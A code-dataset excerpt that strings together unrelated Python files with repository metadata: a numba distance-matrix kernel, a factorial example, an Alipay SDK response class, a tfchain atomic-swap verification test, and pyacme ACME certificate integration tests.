            for j in range(Y.shape[0]):
                result[i, j] = metric(X[i], Y[j])
    return result
# We can gain efficiency by chunking the matrix into blocks;
# this keeps data vectors in cache better
@numba.njit(parallel=True, nogil=True)
def chunked_parallel_special_metric(X, Y=None, metric=hellinger, chunk_size=16):
    """Chunked pairwise distance matrix under ``metric``.

    Processes chunk_size x chunk_size blocks to keep vectors in cache.
    With Y omitted, computes the symmetric X-vs-X matrix starting each row
    chunk at the diagonal and mirroring into the lower triangle; otherwise
    the full X-vs-Y rectangle.
    """
    if Y is None:
        XX, symmetrical = X, True
        row_size = col_size = X.shape[0]
    else:
        XX, symmetrical = Y, False
        row_size, col_size = X.shape[0], Y.shape[0]
    result = np.zeros((row_size, col_size), dtype=np.float32)
    n_row_chunks = (row_size // chunk_size) + 1
    for chunk_idx in numba.prange(n_row_chunks):
        n = chunk_idx * chunk_size
        chunk_end_n = min(n + chunk_size, row_size)
        m_start = n if symmetrical else 0
        for m in range(m_start, col_size, chunk_size):
            chunk_end_m = min(m + chunk_size, col_size)
            for i in range(n, chunk_end_n):
                for j in range(m, chunk_end_m):
                    d = metric(X[i], XX[j])
                    result[i, j] = d
                    if symmetrical:
                        # Mirror into the lower triangle, which the previous
                        # version left as zeros (inconsistent with
                        # parallel_special_metric).  Each (i, j) pair has a
                        # unique writing chunk, so this is race-free.
                        result[j, i] = d
    return result
def pairwise_special_metric(X, Y=None, metric="hellinger", kwds=None):
    """Pairwise distances under one of the "special" metrics.

    A callable metric is wrapped (with any keyword values baked in) and
    handed to ``pairwise_distances`` (presumably sklearn's — confirm the
    file-level import); a string metric is looked up in ``named_distances``
    and evaluated with the numba-parallel kernel.
    """
    if callable(metric):
        if kwds is not None:
            kwd_vals = tuple(kwds.values())
        else:
            kwd_vals = ()
        @numba.njit(fastmath=True)
        def _partial_metric(_X, _Y=None):
            # Bake keyword values in positionally so the wrapper stays jittable.
            return metric(_X, _Y, *kwd_vals)
        return pairwise_distances(X, Y, metric=_partial_metric)
    else:
        special_metric_func = named_distances[metric]
        return parallel_special_metric(X, Y, metric=special_metric_func)
| 26.690238 | 117 | 0.550455 |
e8ccde3e8dc4e79ff40104fc8e4b508cde6cf61e | 130 | py | Python | Experiment1/E1.py | menaka121/pythonTuts | 8ec48182a38dd656fc64df8b6ae5ac83a372790a | [
"Apache-2.0"
] | null | null | null | Experiment1/E1.py | menaka121/pythonTuts | 8ec48182a38dd656fc64df8b6ae5ac83a372790a | [
"Apache-2.0"
] | null | null | null | Experiment1/E1.py | menaka121/pythonTuts | 8ec48182a38dd656fc64df8b6ae5ac83a372790a | [
"Apache-2.0"
] | null | null | null | # Factorial using python
def fact(n):
    """Recursively compute the factorial of n (n! with fact(0) == 1)."""
    return 1 if n == 0 else n * fact(n - 1)


print(fact(100))
| 10.833333 | 28 | 0.523077 |
09fc99e4868d0768a7485bbddaa06ef1feab52e6 | 458 | py | Python | alipay/aop/api/response/AlipayEbppInvoiceRegisterModifyResponse.py | antopen/alipay-sdk-python-all | 8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c | [
"Apache-2.0"
] | 213 | 2018-08-27T16:49:32.000Z | 2021-12-29T04:34:12.000Z | alipay/aop/api/response/AlipayEbppInvoiceRegisterModifyResponse.py | antopen/alipay-sdk-python-all | 8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c | [
"Apache-2.0"
] | 29 | 2018-09-29T06:43:00.000Z | 2021-09-02T03:27:32.000Z | alipay/aop/api/response/AlipayEbppInvoiceRegisterModifyResponse.py | antopen/alipay-sdk-python-all | 8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c | [
"Apache-2.0"
] | 59 | 2018-08-27T16:59:26.000Z | 2022-03-25T10:08:15.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayEbppInvoiceRegisterModifyResponse(AlipayResponse):
    """Response wrapper for the alipay.ebpp.invoice.register.modify API call."""
    def __init__(self):
        super(AlipayEbppInvoiceRegisterModifyResponse, self).__init__()
    def parse_response_content(self, response_content):
        # NOTE(review): the parsed dict is assigned but never used or
        # returned — this file appears truncated in the dataset row; confirm
        # against the upstream SDK before relying on this behavior.
        response = super(AlipayEbppInvoiceRegisterModifyResponse, self).parse_response_content(response_content)
| 28.625 | 112 | 0.78821 |
34040bb55a90dddd502c5dc5c7c99ae704d3cf27 | 15,354 | py | Python | tests/jstests/12_atomicswap_verify_sender.py | xmonader/pytfchain | ef28238eeaedda1dd5ea8055ea6dc2ca6baa263c | [
"Apache-2.0"
] | null | null | null | tests/jstests/12_atomicswap_verify_sender.py | xmonader/pytfchain | ef28238eeaedda1dd5ea8055ea6dc2ca6baa263c | [
"Apache-2.0"
] | null | null | null | tests/jstests/12_atomicswap_verify_sender.py | xmonader/pytfchain | ef28238eeaedda1dd5ea8055ea6dc2ca6baa263c | [
"Apache-2.0"
] | null | null | null | from Jumpscale import j
import pytest
from Jumpscale.clients.blockchain.tfchain.stub.ExplorerClientStub import TFChainExplorerGetClientStub
def main(self):
    """
    Exercise TFChainWallet.atomicswap.verify from the *sender* side against
    a stubbed explorer (no live network required).

    to run:
    js_shell 'j.clients.tfchain.test(name="atomicswap_verify_sender")'
    """
    # create a tfchain client for devnet
    c = j.clients.tfchain.new("mytestclient", network_type="TEST")
    # or simply `c = j.tfchain.clients.mytestclient`, should the client already exist
    # (we replace internal client logic with custom logic as to ensure we can test without requiring an active network)
    explorer_client = TFChainExplorerGetClientStub()
    # add the blockchain info
    explorer_client.chain_info = '{"blockid":"5c86c987668ca47948a149413f4f004651249073eff4f144fd26b50e218705a8","difficulty":"30203","estimatedactivebs":"2365","height":16639,"maturitytimestamp":1549646167,"target":[0,2,43,120,39,20,204,42,102,32,125,110,53,77,39,71,99,124,13,223,197,154,115,42,126,62,185,120,208,177,21,190],"totalcoins":"0","arbitrarydatatotalsize":4328,"minerpayoutcount":16721,"transactioncount":17262,"coininputcount":633,"coinoutputcount":1225,"blockstakeinputcount":16639,"blockstakeoutputcount":16640,"minerfeecount":622,"arbitrarydatacount":572}'
    # NOTE(review): the long literal below appears wrapped mid-string by the
    # dataset extraction; it is reproduced here exactly as found.
    explorer_client.hash_add('5c86c987668ca47948a149413f4f004651249073eff4f144fd26b50e218705a8', '{"hashtype":"blockid","block":{"minerpayoutids":["84b378d60cbdd78430b39c8eddf226119b6f28256388557dd15f0b046bf3c3ed"],"transactions":[{"id":"9aec9f849e35f0bdd14c5ea9daed20c8fbfa09f5a6771bb46ce787eb7e2b00a0","height":16639,"parent":"5c86c987668ca47948a149413f4f004651249073eff4f144fd26b50e218705a8","rawtransaction":{"version":1,"data":{"coininputs":null,"blockstakeinputs":[{"parentid":"144b2b7711fda335cdae5865ab3729d641266087bc4e088d9fba806345045903","fulfillment":{"type":1,"data":{"publickey":"ed25519:d285f92d6d449d9abb27f4c6cf82713cec0696d62b8c123f1627e054dc6d7780","signature":"f09af1c62026aed18d1d8f80e5a7bd4947a6cb5b6b69097c5b10cb983f0d729662c511a4852fa63690884e2b5c600e3935e08b81aaa757d9f0eb740292ec8309"}}}],"blockstakeoutputs":[{"value":"3000","condition":{"type":1,"data":{"unlockhash":"015a080a9259b9d4aaa550e2156f49b1a79a64c7ea463d810d4493e8242e6791584fbdac553e6f"}}}],"minerfees":null}},"coininputoutputs":null,"coinoutputids":null,"coinoutputunlockhashes":null,"blockstakeinputoutputs":[{"value":"3000","condition":{"type":1,"data":{"unlockhash":"015a080a9259b9d4aaa550e2156f49b1a79a64c7ea463d810d4493e8242e6791584fbdac553e6f"}},"unlockhash":"015a080a9259b9d4aaa550e2156f49b1a79a64c7ea463d810d4493e8242e6791584fbdac553e6f"}],"blockstakeoutputids":["83aa29b3e77f703526e28fbc0d2bfcf2b66c06b665e11cb5535b9575fd0e8105"],"blockstakeunlockhashes":["015a080a9259b9d4aaa550e2156f49b1a79a64c7ea463d810d4493e8242e6791584fbdac553e6f"],"unconfirmed":false}],"rawblock":{"parentid":"8485f94209bf3e01ed169244ab2072ebb0d1c5dc589c95b39a3fbab3641b7a7e","timestamp":1549646257,"pobsindexes":{"BlockHeight":16638,"TransactionIndex":0,"OutputIndex":0},"minerpayouts":[{"value":"10000000000","unlockhash":"015a080a9259b9d4aaa550e2156f49b1a79a64c7ea463d810d4493e8242e6791584fbdac553e6f"}],"transactions":[{"version":1,"data":{"coininputs":null,"blockstakeinputs":[{"parentid":"144b2b7711fda335cdae5865ab3729d6412
66087bc4e088d9fba806345045903","fulfillment":{"type":1,"data":{"publickey":"ed25519:d285f92d6d449d9abb27f4c6cf82713cec0696d62b8c123f1627e054dc6d7780","signature":"f09af1c62026aed18d1d8f80e5a7bd4947a6cb5b6b69097c5b10cb983f0d729662c511a4852fa63690884e2b5c600e3935e08b81aaa757d9f0eb740292ec8309"}}}],"blockstakeoutputs":[{"value":"3000","condition":{"type":1,"data":{"unlockhash":"015a080a9259b9d4aaa550e2156f49b1a79a64c7ea463d810d4493e8242e6791584fbdac553e6f"}}}],"minerfees":null}}]},"blockid":"5c86c987668ca47948a149413f4f004651249073eff4f144fd26b50e218705a8","difficulty":"30203","estimatedactivebs":"2365","height":16639,"maturitytimestamp":1549646167,"target":[0,2,43,120,39,20,204,42,102,32,125,110,53,77,39,71,99,124,13,223,197,154,115,42,126,62,185,120,208,177,21,190],"totalcoins":"0","arbitrarydatatotalsize":4328,"minerpayoutcount":16721,"transactioncount":17262,"coininputcount":633,"coinoutputcount":1225,"blockstakeinputcount":16639,"blockstakeoutputcount":16640,"minerfeecount":622,"arbitrarydatacount":572},"blocks":null,"transaction":{"id":"0000000000000000000000000000000000000000000000000000000000000000","height":0,"parent":"0000000000000000000000000000000000000000000000000000000000000000","rawtransaction":{"version":0,"data":{"coininputs":[],"minerfees":null}},"coininputoutputs":null,"coinoutputids":null,"coinoutputunlockhashes":null,"blockstakeinputoutputs":null,"blockstakeoutputids":null,"blockstakeunlockhashes":null,"unconfirmed":false},"transactions":null,"multisigaddresses":null,"unconfirmed":false}')
    # override internal functionality, as to use our stub client
    c._explorer_get = explorer_client.explorer_get
    c._explorer_post = explorer_client.explorer_post
    # a wallet is required to initiate an atomic swap contract
    w = c.wallets.new("mytestwallet", seed='remain solar kangaroo welcome clean object friend later bounce strong ship lift hamster afraid you super dolphin warm emotion curve smooth kiss stem diet')
    # one can verify that its transaction is sent as sender,
    # not super useful, but it does also contain an optional check to know if it is already refundable
    # verification will fail if the contract could not be found
    # NOTE(review): `tfchain` is not among this module's visible imports;
    # these `tfchain.errors.*` references presumably rely on a name provided
    # elsewhere -- confirm before reuse.
    with pytest.raises(tfchain.errors.AtomicSwapContractNotFound):
        w.atomicswap.verify('023b1c17a01945573933e62ca7a1297057681622aaea52c4c4e198077a263890')
    # add the coin output info of the submitted atomic swap contract
    explorer_client.hash_add('023b1c17a01945573933e62ca7a1297057681622aaea52c4c4e198077a263890', '{"hashtype":"coinoutputid","block":{"minerpayoutids":null,"transactions":null,"rawblock":{"parentid":"0000000000000000000000000000000000000000000000000000000000000000","timestamp":0,"pobsindexes":{"BlockHeight":0,"TransactionIndex":0,"OutputIndex":0},"minerpayouts":null,"transactions":null},"blockid":"0000000000000000000000000000000000000000000000000000000000000000","difficulty":"0","estimatedactivebs":"0","height":0,"maturitytimestamp":0,"target":[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],"totalcoins":"0","arbitrarydatatotalsize":0,"minerpayoutcount":0,"transactioncount":0,"coininputcount":0,"coinoutputcount":0,"blockstakeinputcount":0,"blockstakeoutputcount":0,"minerfeecount":0,"arbitrarydatacount":0},"blocks":null,"transaction":{"id":"0000000000000000000000000000000000000000000000000000000000000000","height":0,"parent":"0000000000000000000000000000000000000000000000000000000000000000","rawtransaction":{"version":0,"data":{"coininputs":[],"minerfees":null}},"coininputoutputs":null,"coinoutputids":null,"coinoutputunlockhashes":null,"blockstakeinputoutputs":null,"blockstakeoutputids":null,"blockstakeunlockhashes":null,"unconfirmed":false},"transactions":[{"id":"4a7ac7930379675c82d0462a86e6d6f4018bdb2bdabaf49f4c177b8de19b4e7c","height":16930,"parent":"c25f345403080b8372a38f66608aa5a2287bdc61b82efe5ee6503ce85e8bcd35","rawtransaction":{"version":1,"data":{"coininputs":[{"parentid":"753aaeaa0c9e6c9f1f8da1974c83d8ca067ad536f464a2e2fc038bbd0404d084","fulfillment":{"type":1,"data":{"publickey":"ed25519:e4f55bc46b5feb37c03a0faa2d624a9ee1d0deb5059aaa9625d8b4f60f29bcab","signature":"b5081e41797f53233c727c344698400a73f2cdd364e241df915df413d3eeafb425ce9b51de3731bcbf830c399a706f4d24ae7066f947a4a36ae1b25415bcde00"}}}],"coinoutputs":[{"value":"50000000000","condition":{"type":2,"data":{"sender":"01b73c4e869b6167abe6180ebe7a907f56e0357b4a2f65eb53d22baad84650eb62fce66
ba036d0","receiver":"01746b199781ea316a44183726f81e0734d93e7cefc18e9a913989821100aafa33e6eb7343fa8c","hashedsecret":"4163d4b31a1708cd3bb95a0a8117417bdde69fd1132909f92a8ec1e3fe2ccdba","timelock":1549736249}}}],"minerfees":["1000000000"]}},"coininputoutputs":[{"value":"51000000000","condition":{"type":1,"data":{"unlockhash":"01b73c4e869b6167abe6180ebe7a907f56e0357b4a2f65eb53d22baad84650eb62fce66ba036d0"}},"unlockhash":"01b73c4e869b6167abe6180ebe7a907f56e0357b4a2f65eb53d22baad84650eb62fce66ba036d0"}],"coinoutputids":["023b1c17a01945573933e62ca7a1297057681622aaea52c4c4e198077a263890"],"coinoutputunlockhashes":["02fb27c67c373c2f30611e0b98bf92ed6e6eb0a69b471457b282903945180cd5c5b8068731f767"],"blockstakeinputoutputs":null,"blockstakeoutputids":null,"blockstakeunlockhashes":null,"unconfirmed":false}],"multisigaddresses":null,"unconfirmed":false}')
    # one can verify it all manually
    contract = w.atomicswap.verify('023b1c17a01945573933e62ca7a1297057681622aaea52c4c4e198077a263890')
    assert contract.outputid == '023b1c17a01945573933e62ca7a1297057681622aaea52c4c4e198077a263890'
    assert contract.amount == '50 TFT'
    assert contract.refund_timestamp == 1549736249
    assert contract.sender == '01b73c4e869b6167abe6180ebe7a907f56e0357b4a2f65eb53d22baad84650eb62fce66ba036d0'
    assert contract.receiver == '01746b199781ea316a44183726f81e0734d93e7cefc18e9a913989821100aafa33e6eb7343fa8c'
    assert contract.secret_hash == '4163d4b31a1708cd3bb95a0a8117417bdde69fd1132909f92a8ec1e3fe2ccdba'
    # the amount can however be verified automatically
    w.atomicswap.verify('023b1c17a01945573933e62ca7a1297057681622aaea52c4c4e198077a263890', amount=50)
    # which will fail if the amount is wrong
    with pytest.raises(tfchain.errors.AtomicSwapContractInvalid):
        w.atomicswap.verify('023b1c17a01945573933e62ca7a1297057681622aaea52c4c4e198077a263890', amount=42)
    # the secret hash can be verified as well, not so important as the sender,
    # would be more used if one is the receiver, but it is possible none the less.
    w.atomicswap.verify('023b1c17a01945573933e62ca7a1297057681622aaea52c4c4e198077a263890', secret_hash='4163d4b31a1708cd3bb95a0a8117417bdde69fd1132909f92a8ec1e3fe2ccdba')
    # which will fail if the secret hash is wrong
    with pytest.raises(tfchain.errors.AtomicSwapContractInvalid):
        w.atomicswap.verify('023b1c17a01945573933e62ca7a1297057681622aaea52c4c4e198077a263890', secret_hash='4163d4b31a1708cd3bb95a0a8117417bdde69fd1132909f92a8ec1e3fe2ccdbb')
    # a minimum duration can also be defined, where the duration defines how long it takes until the
    # contract becomes refundable, 0 if already assumed to be refundable
    w.atomicswap.verify('023b1c17a01945573933e62ca7a1297057681622aaea52c4c4e198077a263890', min_refund_time='+1d')
    # which will fail if assumed wrong
    with pytest.raises(tfchain.errors.AtomicSwapContractInvalid):
        w.atomicswap.verify('023b1c17a01945573933e62ca7a1297057681622aaea52c4c4e198077a263890', min_refund_time=0)
    # if one is assumed to be the sender, it can also be verified automatically
    w.atomicswap.verify('023b1c17a01945573933e62ca7a1297057681622aaea52c4c4e198077a263890', sender=True)
    # if one assumed its position wrong, it will however fail
    with pytest.raises(tfchain.errors.AtomicSwapContractInvalid):
        w.atomicswap.verify('023b1c17a01945573933e62ca7a1297057681622aaea52c4c4e198077a263890', receiver=True)
    # all can be verified at once of course
    w.atomicswap.verify('023b1c17a01945573933e62ca7a1297057681622aaea52c4c4e198077a263890',
        amount=50, secret_hash='4163d4b31a1708cd3bb95a0a8117417bdde69fd1132909f92a8ec1e3fe2ccdba',
        min_refund_time='+1d', sender=True)
    # once the refund time has been reached, it does become refundable, and min_refund_time=0 should validate correctly
    # (same block data as before, but with the rawblock timestamp advanced past
    # the contract's timelock; force=True overwrites the stub's cached entry)
    explorer_client.hash_add('5c86c987668ca47948a149413f4f004651249073eff4f144fd26b50e218705a8', '{"hashtype":"blockid","block":{"minerpayoutids":["84b378d60cbdd78430b39c8eddf226119b6f28256388557dd15f0b046bf3c3ed"],"transactions":[{"id":"9aec9f849e35f0bdd14c5ea9daed20c8fbfa09f5a6771bb46ce787eb7e2b00a0","height":16639,"parent":"5c86c987668ca47948a149413f4f004651249073eff4f144fd26b50e218705a8","rawtransaction":{"version":1,"data":{"coininputs":null,"blockstakeinputs":[{"parentid":"144b2b7711fda335cdae5865ab3729d641266087bc4e088d9fba806345045903","fulfillment":{"type":1,"data":{"publickey":"ed25519:d285f92d6d449d9abb27f4c6cf82713cec0696d62b8c123f1627e054dc6d7780","signature":"f09af1c62026aed18d1d8f80e5a7bd4947a6cb5b6b69097c5b10cb983f0d729662c511a4852fa63690884e2b5c600e3935e08b81aaa757d9f0eb740292ec8309"}}}],"blockstakeoutputs":[{"value":"3000","condition":{"type":1,"data":{"unlockhash":"015a080a9259b9d4aaa550e2156f49b1a79a64c7ea463d810d4493e8242e6791584fbdac553e6f"}}}],"minerfees":null}},"coininputoutputs":null,"coinoutputids":null,"coinoutputunlockhashes":null,"blockstakeinputoutputs":[{"value":"3000","condition":{"type":1,"data":{"unlockhash":"015a080a9259b9d4aaa550e2156f49b1a79a64c7ea463d810d4493e8242e6791584fbdac553e6f"}},"unlockhash":"015a080a9259b9d4aaa550e2156f49b1a79a64c7ea463d810d4493e8242e6791584fbdac553e6f"}],"blockstakeoutputids":["83aa29b3e77f703526e28fbc0d2bfcf2b66c06b665e11cb5535b9575fd0e8105"],"blockstakeunlockhashes":["015a080a9259b9d4aaa550e2156f49b1a79a64c7ea463d810d4493e8242e6791584fbdac553e6f"],"unconfirmed":false}],"rawblock":{"parentid":"8485f94209bf3e01ed169244ab2072ebb0d1c5dc589c95b39a3fbab3641b7a7e","timestamp":1549791703,"pobsindexes":{"BlockHeight":16638,"TransactionIndex":0,"OutputIndex":0},"minerpayouts":[{"value":"10000000000","unlockhash":"015a080a9259b9d4aaa550e2156f49b1a79a64c7ea463d810d4493e8242e6791584fbdac553e6f"}],"transactions":[{"version":1,"data":{"coininputs":null,"blockstakeinputs":[{"parentid":"144b2b7711fda335cdae5865ab3729d6412
66087bc4e088d9fba806345045903","fulfillment":{"type":1,"data":{"publickey":"ed25519:d285f92d6d449d9abb27f4c6cf82713cec0696d62b8c123f1627e054dc6d7780","signature":"f09af1c62026aed18d1d8f80e5a7bd4947a6cb5b6b69097c5b10cb983f0d729662c511a4852fa63690884e2b5c600e3935e08b81aaa757d9f0eb740292ec8309"}}}],"blockstakeoutputs":[{"value":"3000","condition":{"type":1,"data":{"unlockhash":"015a080a9259b9d4aaa550e2156f49b1a79a64c7ea463d810d4493e8242e6791584fbdac553e6f"}}}],"minerfees":null}}]},"blockid":"5c86c987668ca47948a149413f4f004651249073eff4f144fd26b50e218705a8","difficulty":"30203","estimatedactivebs":"2365","height":16639,"maturitytimestamp":1549646167,"target":[0,2,43,120,39,20,204,42,102,32,125,110,53,77,39,71,99,124,13,223,197,154,115,42,126,62,185,120,208,177,21,190],"totalcoins":"0","arbitrarydatatotalsize":4328,"minerpayoutcount":16721,"transactioncount":17262,"coininputcount":633,"coinoutputcount":1225,"blockstakeinputcount":16639,"blockstakeoutputcount":16640,"minerfeecount":622,"arbitrarydatacount":572},"blocks":null,"transaction":{"id":"0000000000000000000000000000000000000000000000000000000000000000","height":0,"parent":"0000000000000000000000000000000000000000000000000000000000000000","rawtransaction":{"version":0,"data":{"coininputs":[],"minerfees":null}},"coininputoutputs":null,"coinoutputids":null,"coinoutputunlockhashes":null,"blockstakeinputoutputs":null,"blockstakeoutputids":null,"blockstakeunlockhashes":null,"unconfirmed":false},"transactions":null,"multisigaddresses":null,"unconfirmed":false}', force=True)
    # we should be able to refund at this point
    w.atomicswap.verify('023b1c17a01945573933e62ca7a1297057681622aaea52c4c4e198077a263890',
        amount=50, secret_hash='4163d4b31a1708cd3bb95a0a8117417bdde69fd1132909f92a8ec1e3fe2ccdba',
        min_refund_time=0, sender=True)
| 178.534884 | 3,548 | 0.823824 |
be12e7c9c3d50c296a1cb865edf76e532e01511c | 7,777 | py | Python | test/test_integration.py | Juniormin123/pyacme | 99e844e44fac78ab3e1a0a73f6f6fa8f313489f3 | [
"MIT"
] | null | null | null | test/test_integration.py | Juniormin123/pyacme | 99e844e44fac78ab3e1a0a73f6f6fa8f313489f3 | [
"MIT"
] | null | null | null | test/test_integration.py | Juniormin123/pyacme | 99e844e44fac78ab3e1a0a73f6f6fa8f313489f3 | [
"MIT"
] | null | null | null | from pyacme.settings import LETSENCRYPT_STAGING
import pytest
from conftest import Path
from conftest import settings
from test_common import *
@pytest.fixture(scope='class')
def root_host_entry(request):
    # Class-scoped fixture: add a hosts-file entry (domains -> IP) taken from
    # the @pytest.mark.host_entry(...) marker on the test class; no-op when
    # the marker is absent.  add_host_entry comes from test_common.
    marker = request.node.get_closest_marker('host_entry')
    if marker is None:
        return
    add_host_entry(*marker.args)
@pytest.fixture(scope='class')
def setup_pebble_docker(request, root_host_entry):
    # Class-scoped fixture that starts (and tears down) the pebble ACME test
    # server container, driven by the @pytest.mark.docker_type(...) marker.
    # Depends on root_host_entry so host entries exist before the container.
    # NOTE(review): unlike root_host_entry this assumes the marker is always
    # present -- a class without @pytest.mark.docker_type would raise
    # AttributeError on marker.args; confirm that is intended.
    # override start_pebble_docker form conftest.py
    marker = request.node.get_closest_marker('docker_type')
    if marker.args[0] == 'standalone':
        print('using standalone container setup')
        # override start_pebble_docker() from conftest.py;
        # only run the pebble container, without challtest
        # timestamped name keeps concurrent/repeated runs from colliding
        container_name = time.strftime(settings.BAK_TIME_FMT, time.localtime())
        container_name = 'pebble_' + container_name
        run_pebble_standalone_container(container_name)
        print(f'running container {container_name}')
        yield
        stop_pebble_standalone_container(container_name)
    elif marker.args[0] is None:
        # do not run any container
        yield
@pytest.fixture(scope='function')
def aliyun_access_key() -> Dict[str, str]:
    """Load the Aliyun DNS API credentials used by the dns-mode tests.

    Tries the local key files first (repo root, then the test/ directory so
    the fixture works regardless of the pytest invocation directory) and
    falls back to the ALIYUN_AK / ALIYUN_S environment variables for CI.

    Returns:
        dict with 'access_key' and 'secret' entries.

    Raises:
        KeyError: when no key file exists and the CI variables are unset.
    """
    # flat candidate loop replaces the previous nested try/except pyramid
    for key_file in ('./.aliyun_dns_api.json', 'test/.aliyun_dns_api.json'):
        try:
            with open(key_file) as f:
                return json.load(f)
        except FileNotFoundError:
            continue
    # for ci test
    return {
        'access_key': os.environ['ALIYUN_AK'],
        'secret': os.environ['ALIYUN_S'],
    }
# def get_aliyun_access_key(key_file: str) -> Dict[str, str]:
# with open(key_file, 'r') as f:
# return json.load(f)
def run_test_main(**main_param) -> None:
    """Build a pyacme CLI argument list from keyword params and invoke it.

    ``domain`` and ``contact`` are required and repeatable (``-d``/``-c``);
    ``no_ssl_verify`` and ``debug`` are boolean switches emitted only when
    truthy; every other keyword maps to its CLI flag via ``param_dict``.
    """
    # keyword name -> CLI flag
    param_dict = {
        'country_code': '-C',
        'csr_subjects': '--csr_subjects',
        'account_private_key': '--account_private_key',
        'not_before': '--not_before',
        'not_after': '--not_after',
        'working_directory': '-w',
        'mode': '-m',
        'dnsprovider': '--dnsprovider',
        'access_key': '-k',
        'secret': '-s',
        'dns_specifics': '--dns_specifics',
        'CA_entry': '--CA_entry',
        'poll_interval': '--poll_interval',
        'poll_retry_count': '--poll_retry_count',
        'csr_priv_key_type': '--csr_priv_key_type',
        'csr_priv_key_size': '--csr_priv_key_size',
        'chall_resp_server_port': '--chall_resp_server_port',
    }
    run_arg = []
    for d in main_param.pop('domain'):
        run_arg += ['-d', d]
    for c in main_param.pop('contact'):
        run_arg += ['-c', c]
    # pop() unconditionally removes the boolean switches.  The previous
    # "if present and truthy: append + del" left *falsy* values (e.g.
    # no_ssl_verify=False) in main_param, which then fell through to the
    # param_dict lookup below and raised KeyError.
    if main_param.pop('no_ssl_verify', False):
        run_arg += ['--no_ssl_verify']
    if main_param.pop('debug', False):
        run_arg += ['--debug']
    for k, v in main_param.items():
        run_arg += [param_dict[k], v]
    main_entry_point_test(run_arg)
def _common(params: dict, ca = 'pebble'):
    # Shared body for the parametrised tests: run the pyacme main entry with
    # ``params``, then verify the issued certificate chain with openssl
    # against the CA root -- pebble's root by default, or the Let's Encrypt
    # staging fake root when ca == 'staging'.
    # assert subprocess_run_pyacme(**params).returncode == 0
    run_test_main(**params)
    # resolve the working directory the CLI wrote the certificate into
    if 'working_directory' in params:
        wd = Path(params['working_directory']).expanduser().absolute()
    else:
        wd = Path(settings.WD_DEFAULT).expanduser().absolute()
    wd = wd / '_'.join(params['domain'])  # domain must exist
    root_cert = 'pebble-root-cert.pem'
    if ca == 'pebble':
        download_root_cert(wd/settings.WD_CERT)
        root_cert = 'pebble-root-cert.pem'
    elif ca == 'staging':
        root_cert = 'fake_root.pem'
        download_root_cert(wd/settings.WD_CERT, STAGING_ROOT_CA, root_cert)
    verify_p = openssl_verify(
        cert_path=wd/settings.WD_CERT/settings.CERT_NAME,
        chain_path=wd/settings.WD_CERT/settings.CERT_CHAIN,
        root_cert_path=wd/settings.WD_CERT,
        root_cert_name=root_cert
    )
    assert verify_p.returncode == 0
# domains resolved to 127.0.0.1 via the host_entry marker (http mode)
_DOMAIN = ['test-integration.local']
_MULTI_DOMAIN = ['a.test-integration.local', 'b.test-integration.local']
# parameters shared by every http-mode invocation of the pyacme CLI;
# no_ssl_verify because the local pebble CA is self-signed
_HTTP_MODE_COMMON_PARAM_PORTION = dict(
    contact=TEST_CONTACTS,
    country_code='UN',
    CA_entry=PEBBLE_TEST,
    mode='http',
    no_ssl_verify=True,
    chall_resp_server_port=PY_HTTPSERVER_PORT,
)
# pytest.param entries consumed by TestHttpMode: single/multi domain, an
# alternate working directory, and ES256 CSR keys; the ids name each scenario
# in the pytest output.
http_mode_params = [
    pytest.param(
        dict(domain=_DOMAIN, **_HTTP_MODE_COMMON_PARAM_PORTION),
        id='http_mode_single_domain'
    ),
    pytest.param(
        dict(domain=_MULTI_DOMAIN, **_HTTP_MODE_COMMON_PARAM_PORTION),
        id='http_mode_multi_domain'
    ),
    pytest.param(
        dict(
            domain=_MULTI_DOMAIN,
            working_directory='~/.pyacme/new',
            **_HTTP_MODE_COMMON_PARAM_PORTION
        ),
        id='http_mode_multi_domain_new_wd'
    ),
    pytest.param(
        dict(
            domain=_DOMAIN,
            **_HTTP_MODE_COMMON_PARAM_PORTION,
            csr_priv_key_type='es256'
        ),
        id='http_mode_single_domain_es256'
    ),
    pytest.param(
        dict(
            domain=_MULTI_DOMAIN,
            **_HTTP_MODE_COMMON_PARAM_PORTION,
            csr_priv_key_type='es256'
        ),
        id='http_mode_multi_domain_es256'
    ),
]
@pytest.mark.httptest
@pytest.mark.docker_type('standalone')
@pytest.mark.host_entry(_DOMAIN+_MULTI_DOMAIN, '127.0.0.1')
@pytest.mark.usefixtures('setup_pebble_docker')
class TestHttpMode:
    # http-01 challenge tests against a standalone pebble container; the
    # host_entry marker points all test domains at localhost.

    @pytest.mark.parametrize('params', http_mode_params)
    def test_http_mode(self, params):
        _common(params)
        # wait for a while if this is to be tested with test_pebble.py
        # time.sleep(5)
# internationalised (punycode) domains used against Let's Encrypt staging in
# dns mode; includes a wildcard variant (wildcards require dns-01)
_STAGING_DOMAIN = ['test-staging.xn--ihqz7no5gol3b.icu']
_STAGING_WILDCARD_DOMAIN = ['*.xn--ihqz7no5gol3b.icu']
_STAGING_MULTI_DOMAIN = [
    'test-staging-1.xn--ihqz7no5gol3b.icu',
    'test-staging-2.xn--ihqz7no5gol3b.icu',
]
# parameters shared by every dns-mode invocation (Let's Encrypt staging CA)
_DNS_MODE_COMMON_PARAM_PORTION = dict(
    contact=TEST_CONTACTS,
    country_code='UN',
    CA_entry=LETSENCRYPT_STAGING,
    mode='dns',
)
# dns-mode variant pointed at the local pebble CA instead; pebble's TLS cert
# is self-signed, hence no_ssl_verify
_DNS_MODE_PEBBLE_PARAM: dict = _DNS_MODE_COMMON_PARAM_PORTION.copy()
_DNS_MODE_PEBBLE_PARAM.update(
    dict(
        CA_entry=PEBBLE_TEST,
        no_ssl_verify=True,
    )
)
# pytest.param entries consumed by TestDNSMode: single, multi and wildcard
# domains against the Let's Encrypt staging CA.
dns_mode_params = [
    pytest.param(
        dict(domain=_STAGING_DOMAIN, **_DNS_MODE_COMMON_PARAM_PORTION),
        id='dns_mode_single_domain'
    ),
    pytest.param(
        dict(domain=_STAGING_MULTI_DOMAIN, **_DNS_MODE_COMMON_PARAM_PORTION),
        id='dns_mode_multi_domain'
    ),
    pytest.param(
        dict(domain=_STAGING_WILDCARD_DOMAIN, **_DNS_MODE_COMMON_PARAM_PORTION),
        id='dns_mode_wildcard_domain'
    ),
]
@pytest.mark.dnstest
@pytest.mark.docker_type(None)
